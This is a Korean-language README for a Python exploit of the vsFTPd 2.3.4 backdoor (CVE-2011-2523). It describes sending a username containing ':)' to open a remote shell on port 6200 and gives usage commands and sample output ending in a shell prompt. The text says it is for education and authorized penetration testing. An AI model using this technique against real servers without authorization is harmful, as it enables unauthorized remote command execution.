
vsFTPd 2.3.4 백도어(CVE-2011-2523)용 Python 익스플로잇으로, 조작된 사용자 이름을 통해 포트 6200에서 숨겨진 셸을 트리거하여 승인된 침투 테스트를 위한 원격 명령 실행을 가능하게 합니다.
이 프로젝트는 Python과 pwntools를 사용하여 vsFTPd 2.3.4 백도어 취약점(CVE-2011-2523) 을 악용하는 방법을 시연합니다.
면책 조항: 이 프로젝트는 교육 및 승인된 침투 테스트 목적으로만 사용됩니다. 허가 없이 시스템에 사용하지 마십시오.
👉 취약한 버전의 vsFTPd에는 로그인 시 :)가 포함된 사용자 이름이 사용될 때 트리거되는 악성 백도어가 포함되어 있습니다.
vsFTPd 2.3.4인지 확인USER hello:)) 전송pwntools 라이브러리의존성 설치:
pip install pwntools
python3 exploit.py <TARGET_IP>
python3 exploit.py <TARGET_IP> <PORT>
python3 exploit.py 192.168.190.140
[+] Checking FTP Version...
[+] Triggering backdoor...
[+] Connecting to backdoor....
[+] Got Shell
$
대상은 vsFTPd 2.3.4(취약한 버전) 를 실행 중이어야 합니다.
포트 6200에 연결할 수 있어야 합니다.
다음과 같은 실습 환경에서 가장 잘 작동합니다: